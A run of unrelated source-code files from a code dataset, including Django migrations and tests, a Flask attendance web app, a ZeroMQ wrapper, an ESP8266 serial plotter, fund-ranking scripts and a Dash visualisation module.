models.CharField(max_length=250, null=True, blank=True)),\n ('featured', models.BooleanField(default=False, help_text=b'Tick this to keep this item at the top.')),\n ('uploaded', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n 'ordering': ('-featured', '-uploaded'),\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Link',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=30)),\n ('url', models.URLField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TinyPage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200)),\n ('slug', models.SlugField()),\n ('intro_paragraph', models.TextField(help_text=b'This uses Markdown, which is documented here.')),\n ('contents', models.TextField(help_text=b'This uses Markdown, which is documented here.', null=True, blank=True)),\n ('image', sorl.thumbnail.fields.ImageField(null=True, upload_to=b'squigcard/pages/', blank=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"squigcards/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"330855496","text":"from threading import Thread\nimport time\nimport serial\nimport matplotlib.pyplot as plt\n\nclass Runner(Thread):\n def __init__(self):\n super().__init__()\n self.t0 = time.time()\n self.data = {\n 'delta_t': [],\n 'delta_t_control': [],\n }\n\n self.pending_cmd = None\n self.path_base = 'output_%d' % (int(time.time()) % 1000)\n\n def save(self):\n with open(self.path_base + '_delta_t.csv', 'w') as outp:\n for t, v in self.data['delta_t']:\n outp.write(\"%f,%f\\n\" % (t, v))\n with open(self.path_base + '_delta_t_control.csv', 'w') as outp:\n for t, dt, c in self.data['delta_t_control']:\n outp.write(\"%f,%f,%f\\n\" % (t, c, dt))\n\n def run(self):\n with serial.Serial('/dev/ttyUSB0', 74880) as ser:\n pending_dt = None\n while True:\n line = ser.readline()\n if line == b'k\\n':\n print(\"OK\")\n continue\n\n while len(line) < 4:\n line += ser.readline()\n\n if len(line) == 4:\n if line[0] == ord('d'):\n self.data['delta_t'] += [\n (time.time() - self.t0, int(line[1]) * 256 + int(line[2]))\n ]\n elif line[0] == ord('a'):\n pending_dt = int(line[1]) * 256 + int(line[2])\n elif line[0] == ord('f'):\n if pending_dt is not None:\n self.data['delta_t_control'] += [\n (time.time() - self.t0, pending_dt, int(line[1]) * 256 + int(line[2]))\n ]\n pending_dt = None\n else:\n print(\"Warning! Did not receive delta_t\")\n else:\n print(\"Warning! Unexpected: %s\" % line)\n\n self.save()\n if self.pending_cmd is not None:\n ser.write((self.pending_cmd + \"\\n\").encode(\"ascii\"))\n self.pending_cmd = None\n\n\nrunner = Runner()\nrunner.start()\n\ntime.sleep(2)\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.ion()\nplt.show()\n\nsetpoint = 2330.\nsetpoint *= 33.3 / 45.\n\nwhile True:\n ax.clear()\n ax.plot(\n [d[0] for d in runner.data['delta_t']],\n [100*(2330-d[1])/2330. for d in runner.data['delta_t']], 'r+', alpha=.1)\n ax.plot(\n [d[0] for d in runner.data['delta_t_control']],\n [100*(2330-d[1])/2330. for d in runner.data['delta_t_control']], 'r-')\n ax.plot(\n [d[0] for d in runner.data['delta_t_control']],\n [d[2]/1000. - 5. for d in runner.data['delta_t_control']], 'b-')\n\n plt.ylim((-5, 5))\n plt.draw()\n cmd = input(\"Update? \")\n if len(cmd.strip()) > 0:\n runner.pending_cmd = cmd.strip()\n","sub_path":"esp8266-beogram/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"418794770","text":"# -*- coding: utf-8 -*-\n\"\"\"\n zmqconnector.py\n\n ZeroMQ Connector - Abstraction around a simple socket using\n ZMQ's PAIR socket type. (i.e. a Pipe)\n\n :copyright: (c) 2017 by Eric Gustafson\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nVERSION = (0, 2)\n__version__ = '.'.join(map(str, VERSION[0:2]))\n__description__ = 'ZeroMQ Connector in Python'\n__author__ = 'Eric Gustafson'\n__license__ = 'BSD'\n\nimport zmq\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n## ############################################################\n\nclass ZmqConnection(object):\n \"\"\"ZeroMQ generalized connection\"\"\"\n\n def __init__(self, host, port):\n self.addr = \"tcp://{}:{}\".format(host, int(port))\n self.zcontext = zmq.Context()\n self.closed = False\n\n def send(self, data):\n return self.sock.send(data)\n\n def recv(self):\n return self.sock.recv()\n\n def close(self, linger=None):\n self.sock.close(linger)\n self.closed = True\n\n\nclass ZmqServer(ZmqConnection):\n\n def __init__(self, host, port):\n super(ZmqServer, self).__init__(host, port)\n self.sock = self.zcontext.socket(zmq.PAIR)\n self.sock.bind(self.addr)\n logger.debug(\"zmq listening on {}\".format(self.addr))\n\n\nclass ZmqClient(ZmqConnection):\n\n def __init__(self, host, port):\n super(ZmqClient, self).__init__(host, port)\n self.sock = self.zcontext.socket(zmq.PAIR)\n self.sock.connect(self.addr)\n logger.debug(\"zmq connecting to ()\".format(self.addr))\n\n\nif __name__=='__main__':\n logging.basicConfig(level='DEBUG', format='%(asctime)s - %(levelname)s - pid:%(process)d - %(message)s')\n logger.info(\"Using pyzmq v{}\".format(zmq.__version__))\n logger.info(\"Using libzmq v{}\".format(zmq.zmq_version()))\n","sub_path":"zmqconnector.py","file_name":"zmqconnector.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"73166198","text":"from flask import Flask, send_from_directory, redirect, render_template, request, jsonify\nfrom werkzeug.utils import secure_filename\nfrom functions import *\nimport math\nimport json\nimport os\nimport sys\nimport numpy as np\nimport time\nimport pickle\nimport uuid\nfrom multiprocessing import Process, Lock\n# from threading import Thread, Lock\nimport shutil\nfrom test_model import *\nUPLOAD_FOLDER = './uploads'\n\napp = Flask(__name__)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nimg_stack = []\n\nif not os.path.isdir(data_dir):\n os.mkdir(data_dir)\n\nclass RequestFailError(Exception):\n pass\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ['jpg', 'jpeg']\n\n@app.route('/static/js/')\ndef serve_static_js(path):\n return send_from_directory('static/js', path)\n\n@app.route('/static/css/')\ndef serve_static_css(path):\n return send_from_directory('static/css', path)\n\n@app.route('/static/img/')\ndef serve_static_img(path):\n return send_from_directory('static/img', path)\n\n@app.route('/static/fonts/')\ndef serve_static_fonts(path):\n return send_from_directory('static/fonts', path)\n\n@app.route('/')\ndef redirect_to_users():\n return redirect('/users')\n\n@app.route('/users')\ndef users():\n return render_template('users.j2')\n\n@app.route('/users/')\ndef user(user_id):\n return render_template('user.j2', user_id=user_id)\n\n@app.route('/users/new')\ndef new_user():\n return render_template('newuser.j2')\n\n@app.route('/attendances')\ndef attendances():\n return render_template('attendances.j2')\n\n@app.route('/dashboard')\ndef show_dashboard():\n return render_template('dashboard_live.j2')\n\n@app.route('/api/users', methods=['GET', 'POST'])\ndef api_users():\n try:\n if request.method == 'GET':\n return jsonify({\n 'success': True,\n 'data': [o.__dict__ for o in get_users()]\n })\n elif request.method == 'POST':\n body = request.json\n return jsonify({\n 'success': True,\n 'user_id': create_user(body['name'], body['email'])\n })\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/users/', methods=['GET', 'PUT'])\ndef api_user(user_id):\n try:\n if request.method == 'GET':\n return jsonify({\n 'success': True,\n 'data': get_user(user_id).__dict__\n })\n else:\n update_user(user_id, request.json)\n return jsonify({\n 'success': True\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/users//train', methods=['POST'])\ndef api_train(user_id):\n try:\n user = get_user(user_id)\n file_keys = ['file' + str(x) for x in range(1, 6)]\n if 'file' not in request.files:\n raise RequestFailError('file not provided')\n file = request.files['file']\n if file:\n secured_filename = secure_filename(str(time.time()) + '.jpg')\n if not os.path.isdir('raw_dataset/' + str(user.user_id)):\n os.mkdir('raw_dataset/' + str(user.user_id))\n filepath = 'raw_dataset/{}/{}'.format(user.user_id, secured_filename)\n file.save(filepath)\n \n return jsonify({\n 'success': True\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n \n\n\n@app.route('/api/attendances')\ndef api_attendances():\n try:\n return jsonify({\n 'success': True,\n 'data': [o.__dict__ for o in get_attendances()]\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/attendance/')\ndef api_attendance(id):\n try:\n return jsonify({\n 'success': True,\n 'data': get_attendance(id).__dict__\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/classify', methods=['POST'])\ndef api_classify():\n try:\n if 'file' not in request.files:\n raise RequestFailError('File not provided')\n file = request.files['file']\n if file.filename == '':\n raise RequestFailError('No file selected')\n if file:\n filename = secure_filename(str(time.time()) + '.jpg')\n filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(filepath)\n img_stack.append(filepath)\n return jsonify({\n 'success': True\n })\n else:\n raise RequestFailError('Invalid file uploaded - ' + file.filename)\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n # socketio.run(app)\n","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"112958627","text":"\n\nfrom xai.brain.wordbase.verbs._proscribe import _PROSCRIBE\n\n#calss header\nclass _PROSCRIBING(_PROSCRIBE, ):\n\tdef __init__(self,): \n\t\t_PROSCRIBE.__init__(self)\n\t\tself.name = \"PROSCRIBING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"proscribe\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_proscribing.py","file_name":"_proscribing.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438339375","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\nclass Room:\n def __init__(self, name, description, items=['nothing, haha loser']):\n self.name = name\n self.description = description\n self.items = items\n self.n = None\n self.e = None\n self.s = None\n self.w = None\n\n def __str__(self):\n if self.items == None:\n print(\"There are no items here\")\n else:\n return \"You are now in {self.name}. {self.description}. You look around for items and find... {self.items}\".format(self=self)\n\n def print_items(self):\n for id, p in enumerate(self.items):\n print(f\"{id}: {p}\")\n print()\n","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"592305899","text":"x = {\"health\": 100, \"ma\": 20} # dictionary\n\naudioSetting = dict(channel=2, bitrate=16, frequency=48000)\n\n# zip은 iterator를 index 마다 묶어주는 역할을 한다.\nprint(zip(['a', 'b'], [1, 2])) # return zip object\n\ny = dict(zip(['a', 'b'], [1, 2]))\nz = dict([('a', 1), ('b', 2)])\n\nprint(audioSetting['channel'])\nprint(audioSetting['bitrate'])\nprint(audioSetting['frequency'])\n\nprint(\"channel\" in audioSetting) # true\nprint(len(audioSetting)) # dic len\n\n# 12.4\n# 연습문제:\n\ncamille = {\n 'health': 575.6,\n 'health_regen': 1.7,\n 'mana': 338.8,\n 'mana_regen': 1.63,\n 'melee': 125,\n 'attack_damage': 60,\n 'attack_speed': 0.625,\n 'armor': 26,\n 'magic_resistance': 32.1,\n 'movement_speed': 340\n}\n\nprint(camille['health'])\nprint(camille['movement_speed'])\n\n# 입력\n# health health_regen mana mana_regen\n# 575.6 1.7 338.8 1.63\n# 결과\n# {'health': 575.6, 'health_regen': 1.7, 'mana': 338.8, 'mana_regen': 1.63}\n# 입력\n# health mana melee attack_speed magic_resistance\n# 573.6 308.8 600 0.625 35.7\n# 결과\n# {'health': 573.6, 'mana': 308.8, 'melee': 600.0, 'attack_speed': 0.625, 'magic_resistance': 35.7}\n\nprint('insert keys and values')\n\nkeys = input().split(' ') # ret list iter\nvalues = input().split(' ') # ret list iter\n\nprint(keys)\nprint(values)\n\nchar_dict = {}\n# or\nchar_dict = dict()\n\nchar_dict = dict(zip(keys, values)) # {'aa': '11', 'kk': '22', 'bb': '33'}\ntest_list = list(zip(keys, values)) # [('aa', '11'), ('kk', '22'), ('bb', '33')]\ntest_tuple = tuple(zip(keys, values))\n# zip은 iterator를 index 마다 묶어주는 역할을 한다.\n# ex) zip([1,2],[3,4]) -> [(1,3),(2,4)]\nprint(char_dict)\nprint(test_list)\nprint(test_tuple)\n","sub_path":"Using_Pycharm_codo/Codo12_usingDictionary/using_Dictionary.py","file_name":"using_Dictionary.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22313655","text":"from rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom ecojunk.junk.models import Deal, JunkPoint\nfrom ecojunk.junk.tests.factories import (\n DealFactory,\n JunkPointFactory,\n JunkPointTypeFactory,\n JunkPointRealisticFactory,\n)\nfrom ecojunk.junk.api.v1.serializers import JunkPointSerializer\nfrom ecojunk.users.constants import RIDER, USER\nfrom ecojunk.users.tests.factories import RolFactory, UserFactory\nfrom django.contrib.gis.geos import Point\n\n\nclass JunkPointTypeResourceTest(APITestCase):\n junk_point_type_factory = JunkPointTypeFactory\n\n def setUp(self):\n self.user = UserFactory()\n\n def test_list_junk_point_types(self):\n junk_point_types = JunkPointTypeFactory.create_batch(size=10)\n\n self.client.force_authenticate(self.user)\n response = self.client.get(\"/api/v1/junk_point_types/\", format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n self.assertEqual(len(junk_point_types), data[\"count\"])\n\n\nclass JunkPointResourceTest(APITestCase):\n junk_point_factory = JunkPointFactory\n\n def setUp(self):\n self.user = UserFactory()\n\n def test_list_junk_points(self):\n junk_points = JunkPointFactory.create_batch(size=10)\n\n self.client.force_authenticate(self.user)\n response = self.client.get(\"/api/v1/junk_points/\", format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n self.assertEqual(len(junk_points), data[\"count\"])\n\n def test_list_junk_points_with_coords(self):\n junk_point = JunkPointRealisticFactory()\n location = Point(39.478_328_1, -0.376_823_7)\n self.client.force_authenticate(self.user)\n response = self.client.get(\n f\"/api/v1/junk_points/?lat={location[1]}&lng={location[0]}\", format=\"json\"\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n serializer = JunkPointSerializer(junk_point)\n self.assertTrue(serializer.data in data[\"results\"])\n\n def test_create_junk_point(self):\n point_types = JunkPointTypeFactory.create_batch(size=3)\n data = {\n \"street_name\": \"Junk point street name\",\n \"description\": \"Junk point description\",\n \"location\": \"POINT (2.2945 48.8583)\",\n \"types\": [point_types[0].pk, point_types[1].pk, point_types[2].pk],\n }\n\n self.client.force_authenticate(self.user)\n response = self.client.post(\"/api/v1/junk_points/\", data=data, format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(JunkPoint.objects.count(), 1)\n\n\nclass DealTest(APITestCase):\n deal_factory = JunkPointFactory\n\n def setUp(self):\n self.user_rider = UserFactory()\n self.user_customer = UserFactory()\n\n self.rol_rider = RolFactory(rol=RIDER)\n self.rol_customer = RolFactory(rol=USER)\n\n self.user_rider.permissions.add(self.rol_rider)\n self.user_rider.save()\n\n self.user_customer.permissions.add(self.rol_customer)\n self.user_customer.save()\n\n def test_list_deal(self):\n deals = DealFactory.create_batch(size=10)\n\n self.client.force_authenticate(self.user_customer)\n response = self.client.get(\"/api/v1/deals/\", format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n self.assertEqual(len(deals), data[\"count\"])\n\n def test_create_deal(self):\n junk_point = JunkPointFactory()\n data = {\"junk_point\": junk_point.pk, \"price\": 2.0}\n\n self.client.force_authenticate(self.user_customer)\n response = self.client.post(\"/api/v1/deals/\", data=data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Deal.objects.count(), 1)\n\n def test_accept_deal(self):\n deal = DealFactory()\n deal.rider = None\n deal.save()\n\n self.client.force_authenticate(self.user_rider)\n response = self.client.post(f\"/api/v1/deals/{deal.pk}/accept_deal/\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(Deal.objects.get(pk=deal.pk).rider == self.user_rider)\n\n def test_decline_deal(self):\n deal = DealFactory()\n\n deal.rider = self.user_rider\n deal.save()\n\n self.client.force_authenticate(self.user_rider)\n response = self.client.post(f\"/api/v1/deals/{deal.pk}/decline_deal/\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n","sub_path":"ecojunk/junk/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"546592438","text":"from test.test_const import CONST_BASE_URL, CONST_PORT, CONST_SSL\nfrom unittest import TestCase\nfrom datetime import date, datetime\n\nfrom pygrocydm import GrocyAPI\nfrom pygrocydm.system import System\nfrom pygrocydm.grocy_api_client import GrocyApiClient\n\n\nclass TestSystem(TestCase):\n\n def setUp(self):\n self.grocy_api = GrocyAPI(CONST_BASE_URL, \"demo_mode\", verify_ssl = CONST_SSL, port = CONST_PORT)\n self.api_client = GrocyApiClient(CONST_BASE_URL, \"demo_mode\", verify_ssl=CONST_SSL, port=CONST_PORT)\n\n\n def test_versions(self):\n system = self.grocy_api.system()\n self.assertIsInstance(system, System)\n self.assertIsInstance(system.grocy_version, str)\n self.assertIsInstance(system.grocy_release_date(), date)\n self.assertIsInstance(system.php_version, str)\n self.assertIsInstance(system.sqlite_version, str)\n\n def test_db_changed_time(self):\n db_time = self.grocy_api.system().db_changed_time()\n self.assertIsInstance(db_time, datetime)\n","sub_path":"test/test_system.py","file_name":"test_system.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313268374","text":"import os, os.path\nimport string\nimport stat\nimport shutil \n\n# Known vid extensions\nvidExtenstions = ['.avi','.mkv','.mp4']\n\nMIN_VID_SIZE_BYTE = 2000000\n\ndef IsVidFile(file):\n\text = os.path.splitext(file)[1]\n\treturn ext in vidExtenstions\n\ndef GetWordDelimiter(baseName):\n\tfirstDot = baseName.find('.')\n\tif firstDot < 0:\n\t\tfirstDot = len(baseName)\n\n\tfirstSpace = baseName.find(' ')\n\tif firstSpace < 0:\n\t\tfirstSpace = len(baseName)\n\n\tif firstDot < firstSpace:\n\t\treturn '.'\n\telif firstSpace < firstDot:\n\t\treturn ' '\n\telse:\n\t\treturn ''\n\ndef CaptalizeFirstLetters(dir, file):\n\text = os.path.splitext(file)[1]\n\tbase = os.path.splitext(file)[0]\n\n\tdelim = GetWordDelimiter(base)\n\tnewBase = string.capwords(base, delim)\n\n\tsrc = os.path.abspath(os.path.join(dir, file))\n\ttrgt = os.path.abspath(os.path.join(dir, newBase + ext))\n\n\tos.rename(src, trgt)\n\n\treturn newBase + ext\n\ndef RemoveNonVideoFilesFromDir(path):\n\tremove = False\n\tif not os.path.isdir(path):\n\t\tif not IsVidFile(path):\n\t\t\tremove = True\n\t\tif os.path.getsize(path) < MIN_VID_SIZE_BYTE:\n\t\t\tremove = True\n\telse:\n\t\tfiles = os.listdir(path)\n\t\tfor file in files:\n\t\t\tfilePath = os.path.join(path, file)\n\t\t\t# Attempt removing non video files from path\n\t\t\tRemoveNonVideoFilesFromDir(filePath)\n\t\t# If the directory is empty we remove it\n\t\tif len(os.listdir(path)) == 0:\n\t\t\tremove = True\n\n\tif remove:\n\t\t# If the file is read only we remove the read only flag as we are about to delete it\n\t\tif not os.access(path, os.W_OK):\n\t\t\tos.chmod(path, stat.S_IWUSR)\n\t\t# Remove it\n\t\tif os.path.isdir(path):\n\t\t\tshutil.rmtree(path)\n\t\telse:\n\t\t\tos.remove(path)\n","sub_path":"Utils/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"278785772","text":"from WindPy import *\nfrom datetime import datetime,timedelta\nfrom pandas import Series,DataFrame\nfrom Fund import Fund,Private_Category,Public_Category\nimport numpy as np\nimport pandas as pd\nimport time\n# from wind_codes import codes_list\nfrom collections import defaultdict\n\n\nclass Funds_group:\n def __init__(self,Funds_list):\n self.funds_list=Funds_list\n def funds_rank(self,judge_on='comprehensive'):\n Funds_list=self.funds_list\n funds_index=[]\n d=defaultdict(list)\n if judge_on=='comprehensive':\n bins=[-0.1,0.15,0.35,0.65,0.85,1.1]\n group_name=['优秀','良好','一般','中下','差']\n rank_weight=np.array([0.4,0.3,0.3])\n for i in range(len(Funds_list)):\n funds_index.append(Funds_list[i].code)\n d['returns'].append(Funds_list[i].accurate_return)\n d['sharp'].append(Funds_list[i].annual_sharp)\n d['max_lost'].append(Funds_list[i].max_lost)\n elif judge_on=='risk':\n bins=[-0.1,0.05,0.2,0.5,0.8,1.1]\n group_name=['低风险','中低风险','一般风险','较高风险','高风险']\n rank_weight=np.array([0.5,0.5])\n\n for i in range(len(Funds_list)):\n funds_index.append(Funds_list[i].code)\n d['volatility_rate'].append(-Funds_list[i].volatility_rate)\n d['max_lost_rate'].append(-Funds_list[i].max_lost_rate)\n else:\n raise TypeError('argument \"judge_on\" must be \"comprehensive\" or \"risk\"')\n\n Data=DataFrame(d,index=funds_index)\n Rank=Data.rank()/len(Data) #pandas默认的rank方法按照ascending排序的,即得分越小,排名越小,得分越大,排名越大\n final_score=(Rank*rank_weight).sum(axis=1).rank()/len(Data)*100\n final_rank=final_score.rank(ascending=False)\n final_rank_pct=final_rank/len(Funds_list)\n\n final_evaluation=pd.cut(final_rank_pct,bins,labels=group_name)\n keys=['score','rank_pct','evaluation']\n result=pd.concat([final_score,final_rank,final_evaluation],axis=1,keys=keys)\n return result\n\n def funds_filter(self,qualified_number=8,latest_setup_date=datetime(1980,1,1),category=''):\n '设置筛选条件'\n if not category: # 如果category为空 那么赋予其 全类型列表\n category=Fund_category.new_categories\n else:\n category=[category]\n Funds_list=self.funds_list\n new_Funds_list=[]\n for i in range(len(Funds_list)):\n fund=Funds_list[i]\n if fund.count>qualified_number and fund.setup_timebeta_thresh:\n market_corr=fund.market_corr_rate\n flag=market_corr[0]\n style='偏小盘' if flag<1/3 else ('混合型' if flag<2/3 else '偏大盘')\n else:\n market_corr=[np.nan,np.nan]\n style=np.nan\n\n Funds_market_corr.append(market_corr)\n styles.append(style)\n Codes.append(code)\n data=np.array(np.column_stack([Funds_market_corr,styles]))\n return DataFrame(data,index=Codes,columns=['大盘比率','小盘比率','持股份股'])\n\n\n\ndef funds_data_load(codes_list,evaluation_range_date):\n '公募基金数据载入'\n w.start()\n # w.wsd(\"600000.SH\",\"close\",\"2013-04-30\", datetime.today()-timedelta(0))\n evaluation_begin_date=evaluation_range_date[0]\n evaluation_end_date=evaluation_range_date[1]\n\n Num_funds = len(codes_list)\n pile = 1000\n N_times = Num_funds // pile\n N_mod = Num_funds % pile\n if N_mod==0:\n N_mod=pile\n N_times-=1\n Funds_profile = w.wss(codes_list[0:N_mod],\n 'Fund_fullname,fund_fundmanager,fund_mgrcomp,fund_setupdate,fund_investtype')\n N_Data = len(Funds_profile.Data)\n\n for i in range(N_times):\n temp_profile = w.wss(codes_list[N_mod + i * pile: N_mod + (i + 1) * pile],\n 'Fund_fullname,fund_fundmanager,fund_mgrcomp,fund_setupdate,fund_investtype')\n Funds_profile.Codes.extend(temp_profile.Codes)\n for j in range(N_Data):\n Funds_profile.Data[j].extend(temp_profile.Data[j])\n\n Funds_list=[]\n names=Fund._field\n for i in range(Num_funds):\n temp_Data=w.wsd(codes_list[i],'nav_adj',evaluation_begin_date,evaluation_end_date)\n temp_TS=Series(temp_Data.Data[0],index=temp_Data.Times).dropna()\n values=[Funds_profile.Data[0][i], Funds_profile.Codes[i],Funds_profile.Data[2][i], Funds_profile.Data[1][i],Funds_profile.Data[3][i], Fund_category(Funds_profile.Data[4][i]),temp_TS]\n fund=Fund(**dict(zip(names,values)))\n Funds_list.append(fund) ##\n return Funds_list\n\ndef funds_data_load_from_excel(xls_name,evaluation_range_date):\n '私募基金数据载入'\n Funds_list=[]\n evaluation_begin_date=evaluation_range_date[0]\n evaluation_end_date=evaluation_range_date[1]\n xls_name='私募数据.xlsx'\n # xls_name='aPieceOfData.xlsx'\n Funds_profile=pd.read_excel(xls_name,0).set_index('代码')\n data=pd.read_excel(xls_name,1)\n data['日期']+=timedelta(microseconds=5000) # 因为要和wind的利率、市场数据配对 所以要调整时间,以保证完全吻合\n data_group=data.groupby('代码')\n # seq=data_group.__iter__().__next__()[1]\n names=Fund._field\n for code,seq in data_group:\n seq=seq.set_index('日期')\n temp_Data=seq['净值']\n dates=temp_Data.index\n index_filter=np.logical_and(dates>evaluation_begin_date,dates bool:\n return self.frameFreq == 0.0\n\n def execute(self):\n self.render()\n\n def render(self):\n pass\n\n def createBaseLayout(self):\n \"\"\"Creates the base layout\"\"\"\n\n # Create banner\n banner = html.Div(\n className=\"app-banner row\",\n children=[\n html.H2(className=\"h2-title\", children=self.name),\n html.H2(className=\"h2-title-mobile\", children=self.name),\n ],\n )\n\n # Add parameter header\n self.addParameter(createLabel('parameter-heading', 'Parameters:'))\n\n # If framerate > 0, create the play, stop, and restart buttons and Timestep label\n if not self.isStatic():\n # Add Play/Restart/Step Buttons\n banner.children.append(\n html.Div(\n className='div-play-buttons',\n id='dynamic-button',\n children=[\n html.Button(\"Play\", id='play-stop-button', n_clicks=0),\n html.Button('Restart', id='restart-button', n_clicks=0),\n html.Button('Step', id='step-button', n_clicks=0),\n dcc.Interval(\n id='interval-component',\n interval=self.frameFreq,\n n_intervals=0\n )\n ]\n )\n )\n\n # Add Timestep label\n self.parameters.append(createLabel('timestep-label', 'Timestep: 0'))\n\n # Apply Play/Stop Callback\n self.app.callback(\n dash.dependencies.Output('play-stop-button', 'children'),\n [dash.dependencies.Input('play-stop-button', 'n_clicks')]\n )(self.play_button_callback)\n # Apply executeSystems() on interval callback and Step button callback\n self.app.callback(\n dash.dependencies.Output('timestep-label', 'children'),\n [dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('step-button', 'n_clicks')]\n )(self.execute_system_on_play_callback)\n\n self.app.layout = html.Div(\n children=[\n # Error Message\n html.Div(id=\"error-message\"),\n # Top Banner\n banner,\n # Body of the App\n html.Div(\n className=\"row app-body\",\n children=[\n # User Controls\n html.Div(\n className=\"four columns card\",\n children=html.Div(\n className=\"bg-white user-control\",\n children=self.parameters)\n ),\n # Graph\n html.Div(\n className=\"eight columns card-left\",\n children=self.displays,\n style={'margin-left': 0}\n ),\n dcc.Store(id=\"error\", storage_type=\"memory\"),\n ],\n ),\n ]\n )\n\n def addDisplay(self, content, add_break=True):\n self.displays.append(content)\n\n if add_break:\n self.displays.append(html.Br())\n\n def addParameter(self, content):\n self.parameters.append(content)\n\n# #################################### Class Callbacks ###########################################\n def play_button_callback(self, n_clicks):\n if n_clicks % 2 == 0:\n self.running = False\n return 'Play'\n else:\n self.running = True\n return 'Stop'\n\n def execute_system_on_play_callback(self, n_intervals, n_clicks):\n context = dash.callback_context.triggered[0]['prop_id'].split('.')[0]\n if context == 'step-button':\n if not self.running:\n self.model.systems.executeSystems()\n elif self.running:\n self.model.systems.executeSystems()\n\n return \"Timestep: {}\".format(self.model.systems.timestep)\n\n# ############################## Graph and Parameter Functionality ##############################\n\n\ndef createScatterPlot(title, data: [[[float], [float], dict]], layout_kwargs: dict = {}):\n \"\"\"Creates a Scatter plot Figure. This function supports multiple traces supplied to the 'data' parameter\n Data should be supplied in the following format:\n [[xdata_1,ydata_1, fig_layout_1], [xdata_2, ydata_2, fig_layout_2], ..., [xdata_n,ydata_n, fig_layout_n]]\n\n The 'fig_layout' property is optional. If it is supplied, the trace in question will be updated to include all of\n the properties specified..\n \"\"\"\n traces = []\n for data_packet in data:\n scatter = go.Scatter(x=data_packet[0], y=data_packet[1])\n traces.append(scatter)\n if len(data_packet) > 2:\n scatter.update(data_packet[2])\n\n return go.Figure(data=traces, layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createScatterGLPlot(title, data: [[[float], [float], dict]], layout_kwargs: dict = {}):\n \"\"\"Creates a Scatter plot Figure that will be rendered using WebGL.\n This function supports multiple traces supplied to the 'data' parameter Data should be supplied in the\n following format:\n [[xdata_1,ydata_1, fig_layout_1], [xdata_2, ydata_2, fig_layout_2], ..., [xdata_n,ydata_n, fig_layout_n]]\n\n The 'fig_layout' property is optional. If it is supplied, the trace in question will be updated to include all of\n the properties specified..\n \"\"\"\n\n traces = []\n for 